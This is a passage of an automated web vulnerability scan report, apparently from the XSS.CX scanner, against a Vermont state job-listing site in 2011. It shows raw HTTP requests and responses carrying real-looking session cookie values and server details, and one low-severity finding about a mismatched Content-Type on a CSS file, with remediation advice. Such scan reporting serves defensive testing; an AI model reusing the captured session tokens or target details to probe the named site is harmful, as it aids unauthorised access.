"http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
GET /ada/works/linkview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:51 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) server-error: true Content-Type: text/html; charset=UTF-8 Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Bookmark Error <b>You may be seeing this error as a result of bookmarking this page. Unfortunately, our site design will not allow the bookmarking of most internal pages.</b> If you wish to contact th ...[SNIP]...
GET /ada/works/resourcesoverview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:50 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/css
The response states that it contains CSS. However, it actually appears to contain plain text.
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
Request
GET /ada/global/style/cfmstyle.css HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:12:02 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) server-error: true Last-Modified: Tue, 15 Nov 2000 12:45:26 GMT Content-Type: text/css
We're sorry, but a fatal error has occurred (no client variables).
Report generated by XSS.CX at Fri Apr 29 17:05:11 CDT 2011.